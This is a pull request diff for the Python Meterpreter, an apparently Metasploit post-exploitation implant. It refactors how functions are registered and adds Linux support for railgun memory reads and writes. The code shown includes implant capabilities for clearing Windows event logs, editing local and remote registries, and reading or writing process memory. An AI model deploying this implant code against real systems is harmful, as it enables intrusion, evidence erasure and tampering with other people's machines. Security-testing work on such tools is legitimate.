### PR TITLE
Python Meterpreter Linux Railgun

### DIFF
--- a/python/meterpreter/ext_server_stdapi.py
+++ b/python/meterpreter/ext_server_stdapi.py
@@ -886,7 +886,7 @@ def stdapi_sys_config_getenv(request, response):
 			response += tlv_pack(TLV_TYPE_ENV_GROUP, pgroup)
 	return ERROR_SUCCESS, response
 
-@meterpreter.register_function_windll
+@meterpreter.register_function_if(has_windll)
 def stdapi_sys_config_getsid(request, response):
 	token = get_token_user(ctypes.windll.kernel32.GetCurrentProcess())
 	if not token:
@@ -1129,7 +1129,7 @@ def stdapi_sys_process_get_processes(request, response):
 		return stdapi_sys_process_get_processes_via_ps(request, response)
 	return ERROR_FAILURE, response
 
-@meterpreter.register_function_windll
+@meterpreter.register_function_if(has_windll)
 def stdapi_sys_eventlog_open(request, response):
 	source_name = packet_get_tlv(request, TLV_TYPE_EVENT_SOURCENAME)['value']
 	handle = ctypes.windll.advapi32.OpenEventLogW(None, source_name)
@@ -1138,7 +1138,7 @@ def stdapi_sys_eventlog_open(request, response):
 	response += tlv_pack(TLV_TYPE_EVENT_HANDLE, handle)
 	return ERROR_SUCCESS, response
 
-@meterpreter.register_function_windll
+@meterpreter.register_function_if(has_windll)
 def stdapi_sys_eventlog_read(request, response):
 	handle = packet_get_tlv(request, TLV_TYPE_EVENT_HANDLE)['value']
 	flags = packet_get_tlv(request, TLV_TYPE_EVENT_READFLAGS)['value']
@@ -1164,14 +1164,14 @@ def stdapi_sys_eventlog_read(request, response):
 		response += tlv_pack(TLV_TYPE_EVENT_STRING, event_string)
 	return ERROR_SUCCESS, response
 
-@meterpreter.register_function_windll
+@meterpreter.register_function_if(has_windll)
 def stdapi_sys_eventlog_clear(request, response):
 	handle = packet_get_tlv(request, TLV_TYPE_EVENT_HANDLE)['value']
 	if not ctypes.windll.advapi32.ClearEventLogW(handle, None):
 		return error_result_windows(), response
 	return ERROR_SUCCESS, response
 
-@meterpreter.register_function_windll
+@meterpreter.register_function_if(has_windll)
 def stdapi_sys_eventlog_numrecords(request, response):
 	handle = packet_get_tlv(request, TLV_TYPE_EVENT_HANDLE)['value']
 	total = ctypes.c_ulong(0)
@@ -1180,7 +1180,7 @@ def stdapi_sys_eventlog_numrecords(request, response):
 	response += tlv_pack(TLV_TYPE_EVENT_NUMRECORDS, total.value)
 	return ERROR_SUCCESS, response
 
-@meterpreter.register_function_windll
+@meterpreter.register_function_if(has_windll)
 def stdapi_sys_eventlog_oldest(request, response):
 	handle = packet_get_tlv(request, TLV_TYPE_EVENT_HANDLE)['value']
 	oldest = ctypes.c_ulong(0)
@@ -1189,7 +1189,7 @@ def stdapi_sys_eventlog_oldest(request, response):
 	response += tlv_pack(TLV_TYPE_EVENT_RECORDNUMBER, oldest)
 	return ERROR_SUCCESS, response
 
-@meterpreter.register_function_windll
+@meterpreter.register_function_if(has_windll)
 def stdapi_sys_eventlog_close(request, response):
 	handle = packet_get_tlv(request, TLV_TYPE_EVENT_HANDLE)['value']
 	if not ctypes.windll.advapi32.CloseEventLogW(handle):
@@ -1353,7 +1353,7 @@ def stdapi_fs_stat(request, response):
 	response += tlv_pack(TLV_TYPE_STAT_BUF, st_buf)
 	return ERROR_SUCCESS, response
 
-@meterpreter.register_function_windll
+@meterpreter.register_function_if(has_windll)
 def stdapi_fs_mount_show(request, response):
 	try:
 		from string import uppercase as letters
@@ -1613,7 +1613,7 @@ def stdapi_net_config_get_interfaces_via_windll_mib():
 		interfaces.append(iface_info)
 	return interfaces
 
-@meterpreter.register_function_windll
+@meterpreter.register_function_if(has_windll)
 def stdapi_net_config_get_proxy(request, response):
 	winhttp = ctypes.windll.winhttp
 	proxyConfig = WINHTTP_CURRENT_USER_IE_PROXY_CONFIG()
@@ -1802,7 +1802,7 @@ def _win_memwrite(address, data, handle=-1):
 		return None
 	return written.value
 
-@meterpreter.register_function_windll
+@meterpreter.register_function_if(has_windll)
 def stdapi_railgun_api(request, response):
 	size_out = packet_get_tlv(request, TLV_TYPE_RAILGUN_SIZE_OUT)['value']
 	stack_blob = packet_get_tlv(request, TLV_TYPE_RAILGUN_STACKBLOB)['value']
@@ -1876,14 +1876,14 @@ def stdapi_railgun_api(request, response):
 	response += tlv_pack(TLV_TYPE_RAILGUN_BACK_BUFFERBLOB_INOUT, ctarray_to_bytes(buff_blob_inout))
 	return ERROR_SUCCESS, response
 
-@meterpreter.register_function_windll
+@meterpreter.register_function_if(has_windll)
 def stdapi_railgun_api_multi(request, response):
 	for group_tlv in packet_enum_tlvs(request, tlv_type=TLV_TYPE_RAILGUN_MULTI_GROUP):
 		group_result = stdapi_railgun_api(group_tlv['value'], bytes())[1]
 		response += tlv_pack(TLV_TYPE_RAILGUN_MULTI_GROUP, group_result)
 	return ERROR_SUCCESS, response
 
-@meterpreter.register_function
+@meterpreter.register_function_if(sys.platform.startswith('linux') or has_windll)
 def stdapi_railgun_memread(request, response):
 	address = packet_get_tlv(request, TLV_TYPE_RAILGUN_MEM_ADDRESS)['value']
 	length = packet_get_tlv(request, TLV_TYPE_RAILGUN_MEM_LENGTH)['value']
@@ -1898,7 +1898,7 @@ def stdapi_railgun_memread(request, response):
 	response += tlv_pack(TLV_TYPE_RAILGUN_MEM_DATA, result)
 	return ERROR_SUCCESS, response
 
-@meterpreter.register_function
+@meterpreter.register_function_if(sys.platform.startswith('linux') or has_windll)
 def stdapi_railgun_memwrite(request, response):
 	address = packet_get_tlv(request, TLV_TYPE_RAILGUN_MEM_ADDRESS)['value']
 	data = packet_get_tlv(request, TLV_TYPE_RAILGUN_MEM_DATA)['value']
@@ -1916,12 +1916,12 @@ def stdapi_railgun_memwrite(request, response):
 def _wreg_close_key(hkey):
 	ctypes.windll.advapi32.RegCloseKey(hkey)
 
-@meterpreter.register_function_windll
+@meterpreter.register_function_if(has_windll)
 def stdapi_registry_close_key(request, response):
 	_wreg_close_key(packet_get_tlv(request, TLV_TYPE_HKEY)['value'])
 	return ERROR_SUCCESS, response
 
-@meterpreter.register_function_windll
+@meterpreter.register_function_if(has_windll)
 def stdapi_registry_create_key(request, response):
 	root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
 	base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
@@ -1933,7 +1933,7 @@ def stdapi_registry_create_key(request, response):
 	response += tlv_pack(TLV_TYPE_HKEY, res_key.value)
 	return ERROR_SUCCESS, response
 
-@meterpreter.register_function_windll
+@meterpreter.register_function_if(has_windll)
 def stdapi_registry_delete_key(request, response):
 	root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
 	base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
@@ -1945,7 +1945,7 @@ def stdapi_registry_delete_key(request, response):
 		result = ctypes.windll.advapi32.RegDeleteKeyA(root_key, ctypes.byref(base_key))
 	return result, response
 
-@meterpreter.register_function_windll
+@meterpreter.register_function_if(has_windll)
 def stdapi_registry_delete_value(request, response):
 	root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
 	value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
@@ -1977,12 +1977,12 @@ def _wreg_enum_key(request, response, hkey):
 		index += 1
 	return result, response
 
-@meterpreter.register_function_windll
+@meterpreter.register_function_if(has_windll)
 def stdapi_registry_enum_key(request, response):
 	hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
 	return _wreg_enum_key(request, response, hkey)
 
-@meterpreter.register_function_windll
+@meterpreter.register_function_if(has_windll)
 def stdapi_registry_enum_key_direct(request, response):
 	err, hkey = _wreg_open_key(request)
 	if err != ERROR_SUCCESS:
@@ -2017,12 +2017,12 @@ def _wreg_enum_value(request, response, hkey):
 		index += 1
 	return result, response
 
-@meterpreter.register_function_windll
+@meterpreter.register_function_if(has_windll)
 def stdapi_registry_enum_value(request, response):
 	hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
 	return _wreg_enum_value(request, response, hkey)
 
-@meterpreter.register_function_windll
+@meterpreter.register_function_if(has_windll)
 def stdapi_registry_enum_value_direct(request, response):
 	err, hkey = _wreg_open_key(request)
 	if err != ERROR_SUCCESS:
@@ -2031,7 +2031,7 @@ def stdapi_registry_enum_value_direct(request, response):
 	_wreg_close_key(hkey)
 	return ret
 
-@meterpreter.register_function_windll
+@meterpreter.register_function_if(has_windll)
 def stdapi_registry_load_key(request, response):
 	root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)
 	sub_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)
@@ -2049,36 +2049,7 @@ def _wreg_open_key(request):
 		return error_result_windows(), 0
 	return ERROR_SUCCESS, handle_id.value
 
-@meterpreter.register_function_windll
-def stdapi_registry_open_key(request, response):
-	err, hkey = _wreg_open_key(request)
-	if err != ERROR_SUCCESS:
-		return err, response
-	response += tlv_pack(TLV_TYPE_HKEY, hkey)
-	return ERROR_SUCCESS, response
-
-@meterpreter.register_function_windll
-def stdapi_registry_open_remote_key(request, response):
-	target_host = packet_get_tlv(request, TLV_TYPE_TARGET_HOST)['value']
-	root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
-	result_key = ctypes.c_void_p()
-	if ctypes.windll.advapi32.RegConnectRegistry(target_host, root_key, ctypes.byref(result_key)) != ERROR_SUCCESS:
-		return error_result_windows(), response
-	response += tlv_pack(TLV_TYPE_HKEY, result_key.value)
-	return ERROR_SUCCESS, response
-
-@meterpreter.register_function_windll
-def stdapi_registry_query_class(request, response):
-	hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
-	value_data = (ctypes.c_char * 4096)()
-	value_data_sz = ctypes.c_uint32()
-	value_data_sz.value = ctypes.sizeof(value_data)
-	if ctypes.windll.advapi32.RegQueryInfoKeyA(hkey, value_data, ctypes.byref(value_data_sz), None, None, None, None, None, None, None, None, None) != ERROR_SUCCESS:
-		return error_result_windows(), response
-	response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data))
-	return ERROR_SUCCESS, response
-
-def _query_value(request, response, hkey):
+def _wreg_query_value(request, response, hkey):
 	value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
 	value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8'))
 	value_type = ctypes.c_uint32()
@@ -2104,21 +2075,7 @@ def _query_value(request, response, hkey):
 		return ERROR_SUCCESS, response
 	return error_result_windows(), response
 
-@meterpreter.register_function_windll
-def stdapi_registry_query_value(request, response):
-	hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
-	return _query_value(request, response, hkey)
-
-@meterpreter.register_function_windll
-def stdapi_registry_query_value_direct(request, response):
-	err, hkey = _wreg_open_key(request)
-	if err != ERROR_SUCCESS:
-		return err, response
-	ret = _query_value(request, response, hkey)
-	_wreg_close_key(hkey)
-	return ret
-
-def _set_value(request, response, hkey):
+def _wreg_set_value(request, response, hkey):
 	value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
 	value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8'))
 	value_type = packet_get_tlv(request, TLV_TYPE_VALUE_TYPE)['value']
@@ -2126,28 +2083,71 @@ def _set_value(request, response, hkey):
 	result = ctypes.windll.advapi32.RegSetValueExA(hkey, ctypes.byref(value_name), 0, value_type, value_data, len(value_data))
 	return result, response
 
-@meterpreter.register_function_windll
+@meterpreter.register_function_if(has_windll)
+def stdapi_registry_open_key(request, response):
+	err, hkey = _wreg_open_key(request)
+	if err != ERROR_SUCCESS:
+		return err, response
+	response += tlv_pack(TLV_TYPE_HKEY, hkey)
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function_if(has_windll)
+def stdapi_registry_open_remote_key(request, response):
+	target_host = packet_get_tlv(request, TLV_TYPE_TARGET_HOST)['value']
+	root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
+	result_key = ctypes.c_void_p()
+	if ctypes.windll.advapi32.RegConnectRegistry(target_host, root_key, ctypes.byref(result_key)) != ERROR_SUCCESS:
+		return error_result_windows(), response
+	response += tlv_pack(TLV_TYPE_HKEY, result_key.value)
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function_if(has_windll)
+def stdapi_registry_query_class(request, response):
+	hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
+	value_data = (ctypes.c_char * 4096)()
+	value_data_sz = ctypes.c_uint32()
+	value_data_sz.value = ctypes.sizeof(value_data)
+	if ctypes.windll.advapi32.RegQueryInfoKeyA(hkey, value_data, ctypes.byref(value_data_sz), None, None, None, None, None, None, None, None, None) != ERROR_SUCCESS:
+		return error_result_windows(), response
+	response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data))
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function_if(has_windll)
+def stdapi_registry_query_value(request, response):
+	hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
+	return _wreg_query_value(request, response, hkey)
+
+@meterpreter.register_function_if(has_windll)
+def stdapi_registry_query_value_direct(request, response):
+	err, hkey = _wreg_open_key(request)
+	if err != ERROR_SUCCESS:
+		return err, response
+	ret = _wreg_query_value(request, response, hkey)
+	_wreg_close_key(hkey)
+	return ret
+
+@meterpreter.register_function_if(has_windll)
 def stdapi_registry_set_value(request, response):
 	hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
-	return _set_value(request, response, hkey)
+	return _wreg_set_value(request, response, hkey)
 
-@meterpreter.register_function_windll
+@meterpreter.register_function_if(has_windll)
 def stdapi_registry_set_value_direct(request, response):
 	err, hkey = _wreg_open_key(request)
 	if err != ERROR_SUCCESS:
 		return err, response
-	ret = _set_value(request, response, hkey)
+	ret = _wreg_set_value(request, response, hkey)
 	_wreg_close_key(hkey)
 	return ret
 
-@meterpreter.register_function_windll
+@meterpreter.register_function_if(has_windll)
 def stdapi_registry_unload_key(request, response):
 	root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
 	base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
 	result = ctypes.windll.advapi32.RegUnLoadKeyA(root_key, base_key)
 	return result, response
 
-@meterpreter.register_function_windll
+@meterpreter.register_function_if(has_windll)
 def stdapi_ui_get_idle_time(request, response):
 	GetLastInputInfo = ctypes.windll.user32.GetLastInputInfo
 	GetLastInputInfo.argtypes = [ctypes.c_void_p]

--- a/python/meterpreter/meterpreter.py
+++ b/python/meterpreter/meterpreter.py
@@ -859,7 +859,7 @@ class PythonMeterpreter(object):
 						client_channel_id = self.add_channel(MeterpreterSocketClient(client_sock))
 						pkt  = struct.pack('>I', PACKET_TYPE_REQUEST)
 						pkt += tlv_pack(TLV_TYPE_METHOD, 'tcp_channel_open')
-						pkt += tlv_pack(TLV_TYPE_UUID, binascii.a2b_hex(PAYLOAD_UUID))
+						pkt += tlv_pack(TLV_TYPE_UUID, binascii.a2b_hex(bytes(PAYLOAD_UUID, 'UTF-8')))
 						pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, client_channel_id)
 						pkt += tlv_pack(TLV_TYPE_CHANNEL_PARENTID, channel_id)
 						pkt += tlv_pack(TLV_TYPE_LOCAL_HOST, inet_pton(channel.family, server_addr[0]))
@@ -871,7 +871,7 @@ class PythonMeterpreter(object):
 				if data:
 					pkt  = struct.pack('>I', PACKET_TYPE_REQUEST)
 					pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_write')
-					pkt += tlv_pack(TLV_TYPE_UUID, binascii.a2b_hex(PAYLOAD_UUID))
+					pkt += tlv_pack(TLV_TYPE_UUID, binascii.a2b_hex(bytes(PAYLOAD_UUID, 'UTF-8')))
 					pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
 					pkt += tlv_pack(TLV_TYPE_CHANNEL_DATA, data)
 					pkt += tlv_pack(TLV_TYPE_LENGTH, len(data))
@@ -885,7 +885,7 @@ class PythonMeterpreter(object):
 			self.interact_channels.remove(channel_id)
 		pkt  = struct.pack('>I', PACKET_TYPE_REQUEST)
 		pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_close')
-		pkt += tlv_pack(TLV_TYPE_UUID, binascii.a2b_hex(PAYLOAD_UUID))
+		pkt += tlv_pack(TLV_TYPE_UUID, binascii.a2b_hex(bytes(PAYLOAD_UUID, 'UTF-8')))
 		pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id())
 		pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
 		pkt  = struct.pack('>I', len(pkt) + 4) + pkt
@@ -1155,7 +1155,7 @@ class PythonMeterpreter(object):
 		resp = struct.pack('>I', PACKET_TYPE_RESPONSE)
 		method_tlv = packet_get_tlv(request, TLV_TYPE_METHOD)
 		resp += tlv_pack(method_tlv)
-		resp += tlv_pack(TLV_TYPE_UUID, binascii.a2b_hex(PAYLOAD_UUID))
+		resp += tlv_pack(TLV_TYPE_UUID, binascii.a2b_hex(bytes(PAYLOAD_UUID, 'UTF-8')))
 
 		handler_name = method_tlv['value']
 		if handler_name in self.extension_functions:

--- a/python/meterpreter/meterpreter.py
+++ b/python/meterpreter/meterpreter.py
@@ -746,6 +746,12 @@ class PythonMeterpreter(object):
 		self.extension_functions[func.__name__] = func
 		return func
 
+	def register_function_if(self, condition):
+		if condition:
+			return self.register_function
+		else:
+			return lambda function: function
+
 	def register_function_windll(self, func):
 		if has_windll:
 			self.register_function(func)


### PR DESCRIPTION
This pull request adds support to the Python Meterpreter to make railgun calls on Linux systems. This also makes some modifications to fix backwards compatibility issues with older versions of Python.

Testing steps will be outlined in the corresponding metasploit PR, although it might be useful to note that this PR is technically the bare-minimum required for the functionality.

A known limitation exists with the `memread` / `memwrite` calls in that they only work on Linux 3.2+ due to the reliance on `process_vm_(read|write)v` system calls. These are necessary to prevent invalid addresses from segfaulting the meterpreter instance and thus killing the session.

Tested with Python 2.5-2.7 & 3.1-3.5 on Linux x86-64.